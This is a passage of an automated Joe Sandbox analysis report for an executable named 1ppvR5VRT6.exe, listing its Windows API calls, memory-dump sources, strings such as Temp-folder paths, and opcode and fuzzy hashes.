                              • lstrlenA.KERNEL32(symphonized: Installing,symphonized: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,0040489C,000000DF,00000000,00000400,?), ref: 00404A1F
                              • wsprintfA.USER32 ref: 00404A27
                              • SetDlgItemTextA.USER32(?,symphonized: Installing), ref: 00404A3A
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.96962354502.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.96962311276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962388863.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962724840.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: ItemTextlstrlenwsprintf
                              • String ID: %u.%u%s%s$symphonized: Installing
                              • API String ID: 3540041739-853358426
                              • Opcode ID: 1956ebf24d5e1f55d94ce1980efd0233ee95868cdb52b5f3f7c77d6cead7fe34
                              • Instruction ID: 454b38ceac9876f8861c3790537a611104b372144c9fccdb064e9295d2f1ba63
                              • Opcode Fuzzy Hash: 1956ebf24d5e1f55d94ce1980efd0233ee95868cdb52b5f3f7c77d6cead7fe34
                              • Instruction Fuzzy Hash: 2111E773A0412837DB0066799C45EAF329CDB85374F254637FA26F31D1EA78CC1242E9
                              APIs
                              • GetDlgItem.USER32(?), ref: 00401D3F
                              • GetClientRect.USER32(00000000,?), ref: 00401D4C
                              • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D6D
                              • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D7B
                              • DeleteObject.GDI32(00000000), ref: 00401D8A
                              Memory Dump Source
                              • Source File: 00000005.00000002.96962354502.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.96962311276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962388863.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962724840.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                              • String ID:
                              • API String ID: 1849352358-0
                              • Opcode ID: ffde7fea2c20ff78d34b9dd6ca395fc00db0322e175274b43119d545686d3dc4
                              • Instruction ID: 074f51ed6dd20aae2d42350fdade0312ac008d0ce280de7d9e26dccf07732080
                              • Opcode Fuzzy Hash: ffde7fea2c20ff78d34b9dd6ca395fc00db0322e175274b43119d545686d3dc4
                              • Instruction Fuzzy Hash: 62F0FFB2600515AFDB00EBA4DE88DAFB7BCFB44301B04447AF645F2191CB748D018B38
                              APIs
                              • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004032FA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403521,?,00000006,00000008,0000000A), ref: 00405A37
                              • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004032FA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403521,?,00000006,00000008,0000000A), ref: 00405A40
                              • lstrcatA.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405A51
                              Strings
                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A31
                              Memory Dump Source
                              • Source File: 00000005.00000002.96962354502.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.96962311276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962388863.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962724840.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: CharPrevlstrcatlstrlen
                              • String ID: C:\Users\user\AppData\Local\Temp\
                              • API String ID: 2659869361-787714339
                              • Opcode ID: 00f54151576635bf1518ba316310c1363eddf8ffcac7d82473bc198909657139
                              • Instruction ID: 868260c831235620665dea70b18de3ff29fa680cd517475ab4f5cc36a8a73f00
                              • Opcode Fuzzy Hash: 00f54151576635bf1518ba316310c1363eddf8ffcac7d82473bc198909657139
                              • Instruction Fuzzy Hash: 79D023726015303AD1127F154C05DCF1A4C8F023507050077F200B7191CB3C0D514BFE
                              APIs
                              • CharNextA.USER32(?,?,C:\,?,00405B36,C:\,C:\,75A33410,?,75A32EE0,00405881,?,75A33410,75A32EE0,00000000), ref: 00405AD8
                              • CharNextA.USER32(00000000), ref: 00405ADD
                              • CharNextA.USER32(00000000), ref: 00405AF1
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.96962354502.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.96962311276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962388863.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962724840.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: CharNext
                              • String ID: C:\
                              • API String ID: 3213498283-3404278061
                              • Opcode ID: f542051b0c3854551ba559e3fab41aa2c74e08886ad556a296c0d482775cdbba
                              • Instruction ID: db937687bc36527a3f7147c44c8c9b1a0bf4ed848bee0725310acd997699ac17
                              • Opcode Fuzzy Hash: f542051b0c3854551ba559e3fab41aa2c74e08886ad556a296c0d482775cdbba
                              • Instruction Fuzzy Hash: D8F0C861B14F501AFB2262640C54B776BA8CB99350F04406BD540671C286BC6C404F6A
                              APIs
                              • CloseHandle.KERNEL32(000002C8,C:\Users\user\AppData\Local\Temp\,0040362E,?,?,00000006,00000008,0000000A), ref: 00403809
                              • CloseHandle.KERNEL32(000002D8,C:\Users\user\AppData\Local\Temp\,0040362E,?,?,00000006,00000008,0000000A), ref: 0040381D
                              Strings
                              • C:\Users\user\AppData\Local\Temp\nskABB0.tmp, xrefs: 0040382D
                              • C:\Users\user\AppData\Local\Temp\, xrefs: 004037FC
                              Memory Dump Source
                              • Source File: 00000005.00000002.96962354502.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.96962311276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962388863.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962724840.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: CloseHandle
                              • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nskABB0.tmp
                              • API String ID: 2962429428-3059980846
                              • Opcode ID: bc9d59c8f271c216c0b0e312611624ce7a9d5bb861437aa17873a49c6d363409
                              • Instruction ID: a243388e665e2d569925beaf0092b2dcbae65f1e85c6ca02b15765f08549dd2e
                              • Opcode Fuzzy Hash: bc9d59c8f271c216c0b0e312611624ce7a9d5bb861437aa17873a49c6d363409
                              • Instruction Fuzzy Hash: 08E04F3250071896C620BF79AE494853B599B41735724C776F138B20F1C73899975AA9
                              APIs
                              • IsWindowVisible.USER32(?), ref: 00405163
                              • CallWindowProcA.USER32(?,?,?,?), ref: 004051B4
                                • Part of subcall function 004041A6: SendMessageA.USER32(0001048A,00000000,00000000,00000000), ref: 004041B8
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.96962354502.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.96962311276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962388863.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962724840.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: Window$CallMessageProcSendVisible
                              • String ID:
                              • API String ID: 3748168415-3916222277
                              • Opcode ID: cef517e8acf1b00021c4c6b190ff76a2e6404192bdc33fc547d340bfee77a79a
                              • Instruction ID: c2e14b81eed27f6ef80c9e529a4f942fbf68e082709ee8d6c9922b6f58a3139d
                              • Opcode Fuzzy Hash: cef517e8acf1b00021c4c6b190ff76a2e6404192bdc33fc547d340bfee77a79a
                              • Instruction Fuzzy Hash: 7801B131900608AFEF218F41DD80F6B3676EB84750F244137FA00BA1D1C7799D929E6D
                              APIs
                              • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402E04,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\1ppvR5VRT6.exe,C:\Users\user\Desktop\1ppvR5VRT6.exe,80000000,00000003), ref: 00405A7E
                              • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E04,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\1ppvR5VRT6.exe,C:\Users\user\Desktop\1ppvR5VRT6.exe,80000000,00000003), ref: 00405A8C
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.96962354502.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.96962311276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962388863.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962724840.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: CharPrevlstrlen
                              • String ID: C:\Users\user\Desktop
                              • API String ID: 2709904686-3443045126
                              • Opcode ID: a2cb5c10c54eab45be364f275a3e0fd7f40b7dc80b72c69925d8ec85e0f8a492
                              • Instruction ID: 40098e637bf6d505f922d12736ff559178fc12fa7d0ee67292c12de19d06dc46
                              • Opcode Fuzzy Hash: a2cb5c10c54eab45be364f275a3e0fd7f40b7dc80b72c69925d8ec85e0f8a492
                              • Instruction Fuzzy Hash: 6ED0A7729089702EF30393108C00B9F6A88CF16341F090062E480A7191C67C0C424BAD
                              APIs
                              • GlobalAlloc.KERNEL32(00000040,?), ref: 1000115B
                              • GlobalFree.KERNEL32(00000000), ref: 100011B4
                              • GlobalFree.KERNEL32(?), ref: 100011C7
                              • GlobalFree.KERNEL32(?), ref: 100011F5
                              Memory Dump Source
                              • Source File: 00000005.00000002.96983501688.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                              • Associated: 00000005.00000002.96983452754.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                              • Associated: 00000005.00000002.96983541203.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                              • Associated: 00000005.00000002.96983601110.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_10000000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: Global$Free$Alloc
                              • String ID:
                              • API String ID: 1780285237-0
                              • Opcode ID: 6ef9e3687ab983c99c874163fdcc0ee6cc2800f994ca68b8431a209e6fec97f5
                              • Instruction ID: 5d3a3765e571093bf703368c32e31ec5bfeafbef09712c331e02e9e13643e521
                              • Opcode Fuzzy Hash: 6ef9e3687ab983c99c874163fdcc0ee6cc2800f994ca68b8431a209e6fec97f5
                              • Instruction Fuzzy Hash: 6531ABB1808255AFF715CFA8DC89AEA7FE8EB052C1B164115FA45D726CDB34D910CB24
                              APIs
                              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405DF2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BA7
                              • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405BBF
                              • CharNextA.USER32(00000000,?,00000000,00405DF2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BD0
                              • lstrlenA.KERNEL32(00000000,?,00000000,00405DF2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BD9
                              Memory Dump Source
                              • Source File: 00000005.00000002.96962354502.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.96962311276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962388863.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962724840.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: lstrlen$CharNextlstrcmpi
                              • String ID:
                              • API String ID: 190613189-0
                              • Opcode ID: 3b856c8c7d4e4c10c4bedc5fcb7273c416007e4233098a198b9b1013c6992f0c
                              • Instruction ID: c0798baac460c4c161baa60e5c3960505173fe7825234d44b9ee5cd82a8c1779
                              • Opcode Fuzzy Hash: 3b856c8c7d4e4c10c4bedc5fcb7273c416007e4233098a198b9b1013c6992f0c
                              • Instruction Fuzzy Hash: 29F06235105918AFCB02DFA9DD40D9EBBB8EF46350B2540B9F840FB211D674FE01ABA9
                              Memory Dump Source
                              • Source File: 00000009.00000002.101737043036.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_160000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 514e234fd012f883d8b190c0be211c1cc448a21758b62627c5acef7ed049d24a
                              • Instruction ID: 2a4050cbfefac01600a84c38ad22c5f0cf09db4f4304e58c2930bc9518e2ae87
                              • Opcode Fuzzy Hash: 514e234fd012f883d8b190c0be211c1cc448a21758b62627c5acef7ed049d24a
                              • Instruction Fuzzy Hash: A8530931D10B5A8ACB51EF68C8845A9F7B5FF99300F11C79AE4587B121EB70AAD4CF81
                              Memory Dump Source
                              • Source File: 00000009.00000002.101737043036.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_160000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f3c51a4d4178b203bfb30b40ed04d84547aca48dc242cfe9ee5b1e391dd6fb53
                              • Instruction ID: c84150fb70920bbfdabd9a04b8dd9ac673f2bd6a8f02dc832fe541c8db96f06e
                              • Opcode Fuzzy Hash: f3c51a4d4178b203bfb30b40ed04d84547aca48dc242cfe9ee5b1e391dd6fb53
                              • Instruction Fuzzy Hash: 8343E731D10B1A8ACB51EF68C8845A9F7B5FF99300F11D79AE4587B121EB70AAD4CF81
                              Memory Dump Source
                              • Source File: 00000009.00000002.101737043036.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_160000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 972a9a853c4a210874087d775d7e9005b8effc918f997c4e911c8a74cebf5a49
                              • Instruction ID: 96a29c3558e15b130f12cd149a21425b2da3bfc4e3fbbfb4066e18156fc11ded
                              • Opcode Fuzzy Hash: 972a9a853c4a210874087d775d7e9005b8effc918f997c4e911c8a74cebf5a49
                              • Instruction Fuzzy Hash: 78332E31D107198ECB11EF68C8946ADF7B1FF99300F15C79AE449AB211EB70AAD5CB81
                              Strings
                              Memory Dump Source
                              • Source File: 00000009.00000002.101767241311.00000000390E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 390E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_390e0000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID:
                              • String ID: D.9
                              • API String ID: 0-3981086169
                              • Opcode ID: 33e2907cc5bde7c44cd58f3575e55785c280d878b95096ab49e0258047a3e4cb
                              • Instruction ID: 5205359c2802b6f15147f629af1b178cb37a9277b9b85e7136ed81f63e5e9241
                              • Opcode Fuzzy Hash: 33e2907cc5bde7c44cd58f3575e55785c280d878b95096ab49e0258047a3e4cb
                              • Instruction Fuzzy Hash: 1D629F39F006098FEB14DB68D595A9DB7F2EF88354F1088A9E805EB351DB35ED42CB90
                              Strings
                              Memory Dump Source
                              • Source File: 00000009.00000002.101737043036.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_160000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID:
                              • String ID: t09
                              • API String ID: 0-198834946
                              • Opcode ID: ed3a95933154dd005eadda064cf942094ae8f718b1177ca06322ab493688b740
                              • Instruction ID: f7b594cb852968a97d47209a440412a138d1a59d4042781fb7aebc0468107016
                              • Opcode Fuzzy Hash: ed3a95933154dd005eadda064cf942094ae8f718b1177ca06322ab493688b740
                              • Instruction Fuzzy Hash: F6322E31E1061A8BCB14DF75DC9059DF7B2BFD9310F60C6AAD409AB264EB30AD86CB50
                              Strings
                              Memory Dump Source
                              • Source File: 00000009.00000002.101737043036.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_160000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID:
                              • String ID: \VGj
                              • API String ID: 0-3673255040
                              • Opcode ID: bbf0bf424883a3a8209472824e44f9419a7b86da7faf875369691dedb2e8d753
                              • Instruction ID: d2c608029644c8ad68e14ee690ab36c748b4f3753d8ed91f5f1a9f52bbfcfcd3
                              • Opcode Fuzzy Hash: bbf0bf424883a3a8209472824e44f9419a7b86da7faf875369691dedb2e8d753
                              • Instruction Fuzzy Hash: 32919B70E00209CFDF14CFA9CC857AEBBF2AF88704F148529E415EB290EB749A55CB91
                              Memory Dump Source
                              • Source File: 00000009.00000002.101767241311.00000000390E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 390E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_390e0000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 830e06bc8c622243cb88f820233dbba57723bba9b63b6d5cdb51e74cadda83e6
                              • Instruction ID: d8bcfd872cb8fc0659d497e5ba25d00f0485a0aa26341381c98eba3c4589bba1
                              • Opcode Fuzzy Hash: 830e06bc8c622243cb88f820233dbba57723bba9b63b6d5cdb51e74cadda83e6
                              • Instruction Fuzzy Hash: 00328434F006498FEB15DB68D891A9EB7F2EF88350F108969E805EB351DB35ED42CB91
                              Memory Dump Source
                              • Source File: 00000009.00000002.101767241311.00000000390E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 390E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_390e0000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 699d8bdd4f108c08606d9eefa85672398e6a3a781eb04515f4766092208f0d5c
                              • Instruction ID: 1245e05f25b84fe6d3ab3ecc2062bd1f35824f6731aa3a2b286d7cf21b90cc8e
                              • Opcode Fuzzy Hash: 699d8bdd4f108c08606d9eefa85672398e6a3a781eb04515f4766092208f0d5c
                              • Instruction Fuzzy Hash: 48029134B00619DFEB14DB74D491A9EBBE2EF84350F108969E405EB391DB39ED42CB90
                              Memory Dump Source
                              • Source File: 00000009.00000002.101737043036.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_160000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 4fb32a04c2382ddcbb46272af005585654aaf4c032094f3353596091deebeabd
                              • Instruction ID: 3d3642ddcba46204c1ca27f6446b151d385643debd3b7756e6d22813d3ec25ce
                              • Opcode Fuzzy Hash: 4fb32a04c2382ddcbb46272af005585654aaf4c032094f3353596091deebeabd
                              • Instruction Fuzzy Hash: 76B16A70E00209DFDF14CFA9DD817AEBBF2AF88714F148529E815AB394EB749851CB85
                              Strings
                              Memory Dump Source
                              • Source File: 00000009.00000002.101737043036.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_160000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID:
                              • String ID: D.9$D.9$t09
                              • API String ID: 0-2029267365
                              • Opcode ID: 67aac5489295c2bd11c0d23c836ef3c9be7b759afeddf80f8214737c00cee4a7
                              • Instruction ID: 7116c4dcdd507141e553e172bc731c77b20edf8db680701aa85b811329b76031
                              • Opcode Fuzzy Hash: 67aac5489295c2bd11c0d23c836ef3c9be7b759afeddf80f8214737c00cee4a7
                              • Instruction Fuzzy Hash: A3923738A00205CFDB24DB68C988A9DB7F2EF45315F54CAA9E449AB351DB35EC56CF80
                              Strings
                              Memory Dump Source
                              • Source File: 00000009.00000002.101737043036.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_160000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID:
                              • String ID: D9$9
                              • API String ID: 0-3493406588
                              • Opcode ID: 2554c44663961e1b3a1225b57983d1c5740247ab32a85194f7c0f8a17ea3f390
                              • Instruction ID: fc84518ef70f82c64463b91f3560ae3eb2644ea3106fd225a5e1b08cb30bd887
                              • Opcode Fuzzy Hash: 2554c44663961e1b3a1225b57983d1c5740247ab32a85194f7c0f8a17ea3f390
